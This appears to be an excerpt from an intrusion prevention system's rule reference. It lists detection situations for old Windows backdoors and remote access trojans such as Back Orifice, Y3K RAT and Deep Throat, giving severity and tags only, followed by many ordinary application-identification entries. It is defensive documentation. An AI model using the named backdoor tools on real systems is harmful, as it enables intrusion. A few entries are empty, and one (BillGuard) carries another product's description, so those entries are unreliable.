Description:
Back to top

BD-TCP_Y3K-RAT-1.4-Server-Banner-Detected

About this situation: BD Y3K RAT 1.4 Banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Y3K RAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Y3K-RAT-1-4
Description:
Back to top

BD-TCP_Y3K-RAT-1.6-Server-Banner-Detected

About this situation: BD Y3K RAT 1.6 Banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Y3K RAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Y3K-RAT-1-6
Description:
Back to top

BD-TCP_YAT-2.1-Server-Banner-Detected

About this situation: BD YAT 2.1 Banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, YAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-YAT-2-1
Description:
Back to top

BD-TCP_YAT-3.01-Server-Banner-Detected

About this situation: BD YAT 3.01 Banner
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, YAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-YAT-3-01
Description:
Back to top

BD-TCP_YAT-3.01-Startup-Command-Detected

About this situation: BD YAT 3.01 Startup
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, YAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-164-2032
Vulnerability: Backdoor-YAT-3-01
Description:
Back to top

BD-TCP_YAT-3.01-Startup-Command-Response

About this situation: BD YAT 3.01 Response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, YAT, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-YAT-3-01
Description:
Back to top

BD-UDP_Alvgus-Request

About this situation: Alvgus backdoor client request
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Alvgus, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Alvgus
Description:
Back to top

BD-UDP_Alvgus-Response

About this situation: Alvgus backdoor response
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Alvgus, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Alvgus
Description:
Back to top

BD-UDP_Back-Orifice

About this situation: Back Orifice Access
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-577-5211
Vulnerability: Backdoor-BackOrifice2000
Description:
Back to top

BD-UDP_Balsitix-Response

About this situation: Balsitix backdoor response
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Balsitix, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: Backdoor-Balsitix
Description:
Back to top

BD-UDP_BLA-Request

About this situation: BLA backdoor client request
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, BLA, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-165-2032
Vulnerability: Backdoor-BLA
Description:
Back to top

BD-UDP_Deep-Throat-Response

About this situation: Deep Throat backdoor response
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Deep Throat, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Deep-Throat
Description:
Back to top

BD-UDP_Deep-Throat-Response-2

About this situation: Deep Throat backdoor response
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, Deep Throat, Windows not specific, Successful Attacks, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: Backdoor-Deep-Throat
Description:
Back to top

BD-UDP_Remote-Boot-Tool-Response

About this situation: Remote Boot Tool backdoor response
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, Remote Boot Tool, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Remote-Boot-Tool
Description:
Back to top

BD-UDP_Revenger-Response

About this situation: Revenger backdoor response
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, Revenger, Windows not specific, Successful Attacks, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Revenger
Description:
Back to top

BD-UDP_The-Unexplained-Response

About this situation: The Unexplained backdoor response
Context: UDP Packet Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, The Unexplained, Windows NT not specific, Successful Attacks, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-The-Unexplained
Description:
Back to top

BD-UDP_Xanadu-1.0-Reply

About this situation: Xanadu Backdoor server reply
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, Xanadu, Windows not specific, Successful Attacks, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Xanadu-1-0
Description:
Back to top

BD-UDP_Xanadu-1.0-Request

About this situation: Xanadu Backdoor client connect
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Xanadu, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Xanadu-1-0
Description:
Back to top

BD-UDP_Y3K-RAT-1.1-Confirm

About this situation: BD Y3K RAT 1.1 Confirm
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Y3K RAT, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Y3K-RAT-1-1
Description:
Back to top

BD-UDP_Y3K-RAT-1.1-Ping

About this situation: BD Y3K RAT 1.1 Ping
Context: UDP Packet Unknown
Severity: 10
Tags: Windows, Any Hardware, Y3K RAT, Windows not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Y3K-RAT-1-1
Description:
Back to top

BD-UDP_Y3K-RAT-1.4-Ping

About this situation: BD Y3K RAT 1.4 Ping
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Y3K RAT, Windows not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Y3K-RAT-1-4
Description:
Back to top

BeamYourScreen

About this situation: Application BeamYourScreen detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BeamYourScreen - desktop sharing with BeamYourScreen for online meetings, web conferences and remote support without any configurations or installations.
Back to top

Beanstalk-App

About this situation: Beanstalk App usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Beanstalk is the complete code hosting workflow for teams or individuals use to write and handling both simple and complex infrastructures for any application.It Create and manage repositories and have your team up and running in minutes.
Back to top

Beanstream

About this situation: Application Beanstream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Beanstream Internet Commerce is an online payment gateway and merchant account provider with offices in the United States and Canada.
Back to top

BeAnywhere-Support-Express

About this situation: Application BeAnywhere-Support-Express detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BeAnywhere Support Express is SaaS solution that allows comprehensive remote access to Microsoft Windows and Apple Mac computers in order to provide IT Support, as well as system management and monitoring.
Back to top

Beats-Music

About this situation: Beats Music usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Beats Music is a subscription-based online music streaming service owned by the Beats Electronics division of Apple, Inc. First developed in 2012 under the name 'Daisy', the service combines algorithm-based personalization with expert music suggestions from a variety of sources.
Back to top

Bebo

About this situation: Bebo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Bebo usage has been detected.
Back to top

BEC

About this situation: BEC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Bec.dk usage detected. BEC is an internet customer service provider for multiple danish banking institutions.
Back to top

Beckon

About this situation: Application Beckon detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Beckon is software-as-a-service platform for marketing, integrates messy marketing data and delivers rich dashboards and scorecards for cross-channel marketing intelligence.
Back to top

Beeg

About this situation: Beeg usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Beeg is an adult video streaming service.
Back to top

Beevolve

About this situation: Application Beevolve detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Beevolve's Social Media Monitoring and Analytics platform helps marketers, brand managers and PR agencies effectively measure, analyze and act on social media conversations.
Back to top

Behance

About this situation: Application Behance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Behance is a network of sites and services specializing in self-promotion, including education and online portfolio sites.
Back to top

Belarc

About this situation: Application Belarc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Belarcs products automatically create an accurate and up-to-date central repository
Back to top

Belks-Credit

About this situation: Application Belks-Credit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Belks Credit - online banking service
Back to top

Benchmark-Email

About this situation: Benchmark Email usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Benchmark Email allows users to create and send bulk HTML email campaigns and online surveys.
Back to top

Benchmark-Systems

About this situation: Application Benchmark-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Benchmark is a Internet based provider of fully integrated solutions that automates all of the clinical and business functions required for healthcare providers.
Back to top

Benefitfocus

About this situation: Application Benefitfocus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Benefitfocus is a provider of benefits technology. By delivering technology that integrates all benefits in one place, Benefitfocus provides a way to engage consumers, educate employees and simplify benefit enrollment and management.
Back to top

BenefitMall

About this situation: Application BenefitMall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BenefitMall provides products, services, and tools to help in the sales of employee benefits to businesses.
Back to top

Benelogic

About this situation: Application Benelogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Benelogic operates as a Software-as-a-Service provider of online benefits administration products.
Back to top

Benevity

About this situation: Application Benevity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Benevity is a software social enterprise passionate about creating distinctive, easy and compelling ways for companies to make a difference while achieving greater business impacts from their cause marketing, community investment, workplace giving and volunteering programs
Back to top

Bentley

About this situation: Application Bentley detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bentley is providing architects, engineers, geospatial professionals, constructors, and owner-operators with comprehensive software solutions for sustaining infrastructure.
Back to top

Benu-Networks

About this situation: Application Benu-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Benu Networks provides carrier Wi-Fi, managed business, and managed home solutions.
Back to top

Bernstein-Research

About this situation: Application Bernstein-Research detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sanford C. Bernstein and Co., also known as Bernstein, is a US financial research company which has been a subsidiary of Investment management firm AllianceBernstein.
Back to top

Best-Stuff

About this situation: Application Best-Stuff detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BestStuff provide professional and up-to-date information on the the best consumer electronics products in the marketplace.
Back to top

beSTORM

About this situation: Application beSTORM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: beSTORM does dynamic security testing of products in development and can be used by network administrators to certify the security of networked applications before deployment.
Back to top

Bet365

About this situation: Bet365 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-630-5211
Description: Bet365 is an online gambling website offering sports betting, poker games and bingo, as well as video streams on sporting events.
Back to top

Betfair

About this situation: Betfair usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Bethesda-Softworks

About this situation: Bethesda Softworks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Description: Bethesda Softworks is an American developer and publiser of video games. It was founded in 1986.
Back to top

BetterCloud

About this situation: Application BetterCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BetterCloud centralizes SaaS management, automates workflows and compliance policies, and surfaces relevant insights across SaaS applications.
Back to top

BetterWorks

About this situation: Application BetterWorks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BetterWorks is an enterprise goals platform trusted by high performing companies to engage, empower and cross-functionally align their workforces.
Back to top

BEYABLE

About this situation: Application BEYABLE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BEYABLE provides traffic conversion solutions for businesses. It takes advantage of the current traffic on website to convert into clients.
Back to top

Beyond-Solutions

About this situation: Application Beyond-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Beyond Solutions provides auction software solutions.
Back to top

BeyondTrust

About this situation: Application BeyondTrust detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BeyondTrust provides authorization management, access control and security solutions for virtualization and cloud computing environments.
Back to top

BGP

About this situation: Border Gateway Protocol routing traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-636-5211
Description: BGP is used to exchange routing information between different Autonomous Systems.
Back to top

Bidsketch

About this situation: Application Bidsketch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bidsketch is proposal software used by freelancers, consultants, and agencies to create professional looking client proposals in minutes.
Back to top

Bidspeed

About this situation: BidSpeed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Bidswitch

About this situation: Bidswitch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-771-5211
Description: Bidswitch is a media delivery company.
Back to top

Big-Fish-Games

About this situation: Big Fish Games usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Big-Red-Cloud

About this situation: Application Big-Red-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Big Red Cloud - Online accounting software for small businesses.
Back to top

BIG4books.com

About this situation: Application BIG4books.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BIG4books is online accounting software for small business: receivables, payables, inventory, multi-user, general ledger, reports and more
Back to top

Bigadda

About this situation: Bigadda usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a social networking service that allows users to create groups and share data (for example, photos, music, videos and other applications). Source: Wikipedia
Back to top

BigAnt-Office-Messenger

About this situation: BigAnt Office Messenger usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-628-5211
Description: BigAnt Office Messenger is an enterprise class instant messaging solution offering instant messaging, voice and video chat, remote desktop, file transfer and document management services. Communication between the BigAnt client and the AntDS server makes use of a proprietary plaintext protocol over TCP.
Back to top

BIGCenter

About this situation: Application BIGCenter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Integration Group provides an integrated workplace management solution that delivers strategic insights to enable informed real estate decisions for owners, occupiers, and investors.
Back to top

Bigcommerce

About this situation: Bigcommerce usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Bigcommerce provides ecommerce software solutions and shopping cart software for online businesses.
Back to top

BigContacts

About this situation: Application BigContacts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BigContacts has developed and manages web based Contact Management and CRM Software that is designed for small businesses that have outgrown basic solutions like Outlook, Goldmine or ACT
Back to top

Biglobe-Blog

About this situation: Biglobe blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: is a Japanese bloging site.
Back to top

Biglobe-Mail

About this situation: Biglobe mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site is a Japanese web mail service that allows users to send and receive e mails.
Back to top

BigMachines

About this situation: Application BigMachines detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BigMachines is a software company. The company's software is designed to integrate with existing ERP
Back to top

BigPanda

About this situation: Application BigPanda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BigPanda helps IT, NOC and DevOps teams automate and scale incident management in production environments.
Back to top

Bigstring

About this situation: BigString usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

BigTime

About this situation: Application BigTime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BigTime is a provider of time and billing tools for accountants and a market leader in QuickBooks integration, BigTime Software is a member of the Microsoft Partner Network and an Intuit Gold Certified Developer..
Back to top

BigUpload

About this situation: BigUpload usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-630-5211
Description: BigUpload is a file-hosting service which provides web space for users' documents, pictures, music and movies.
Back to top

bigWebApps

About this situation: Application bigWebApps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: bigWebApps provides a web based help desk, asset management, and parts inventory solution. bigWebApps HelpDesk solution is delivered as SaaS application aimed at making technicians' happy.
Back to top

Bijingo

About this situation: Application Bijingo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bijingo project management software enables users to plan, track, and improve projects, timesheet software tracks expenses and time, resource management software enables users to plan, manage, and control work for organization resource management, and issue management software tracks and reports on issues, risks, and changes.
Back to top

Bijk

About this situation: Bijk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: With BIJK You get real-time analysis of server load on your customer's servers and through cooperation, help them with upgrades according to HW needs more RAM, HDDs, CPU changes etc.You can also share graphs online for a competitive advantage transparently show load to your customers. You will stand out from the competition and attract more clients.
Back to top

Bill-and-Pay

About this situation: Application Bill-and-Pay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bill Pay integrates with QuickBooks and lets you choose any merchant account. Receive online payments from credit card, checking, or PayPal.
Back to top

Bill.com

About this situation: Bill.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Bill.com is a cash flow management software system, provided as a software as a service that integrates with accounting and banking systems. It is intended to serve as a command and control dashboard for cash flow, by businesses, accounting firms and banks.
Back to top

Bill4Time

About this situation: Application Bill4Time detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bill4Time is a time billing software online, offering time tracking, billing, and project management from any computer or mobile phone.
Back to top

Billbooks

About this situation: Application Billbooks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online Billing Software - Invoicing System for businesses, freelancers and service providers.
Back to top

billfaster.com

About this situation: Application billfaster.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: billfaster.com provides an online invoicing, cash management and expense tracking system with automated accounting for start-ups and small businesses globally.
Back to top

BillGuard

About this situation: Application BillGuard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BullGuard provides antivirus, web-based identity and social media protection that works across all devices and mobile backup software solutions.
Back to top

Billingorchard

About this situation: BillingOrchard usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Online invoicing send professional online invoices without attachments.Create professional, customized and trackable online invoices. Integrate user-friendly Pay Now buttons for instant reconciliation. Schedule recurring invoices.
Back to top

BillingTracker

About this situation: Application BillingTracker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BillingTracker is bookkeeping software designed for the needs service industry professionals. It makes to log and track time and expenses.
Back to top

Billogram

About this situation: Application Billogram detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Billogram is a cloud based service that makes it easier for small businesses to keep track of incoming cashflow and lessens their administrative burden while providing real time up to date information about incoming payments and the status of invoices.
Back to top

Billomat

About this situation: Application Billomat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Billomat is an online service for quoting, billing, including customer management, estimates, invoices and reminders.
Back to top

billQ

About this situation: Application billQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: billQ helps you fight late fees by sending you bill reminders by text and email so you always know what bills are due and when.
Back to top

BillQuick

About this situation: Application BillQuick detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BillQuick offers a flexible time tracking, billing and project management solution, both in terms of functionality and deployment.
Back to top

BillsTrust

About this situation: Application BillsTrust detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Billtrust
Back to top

Bime

About this situation: Application Bime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud created BIME - a powerful modern BI tool capable of turning data from any source into valuable insights and actionable information thus empowering decision-making and impacting business results. Through its pure cloud model, it turns the web into a seamlessly connected data warehouse thus making data analysis, visualization and dashboarding a fast, low-cost, intuitive service for both business and tech users
Back to top

BIN File

About this situation: BIN file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Unidentified Binary File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Binance

About this situation: Binance traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Description: Binance is a marketplace for cryptocurrency.
Back to top

Binary-Lane

About this situation: Application Binary-Lane detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
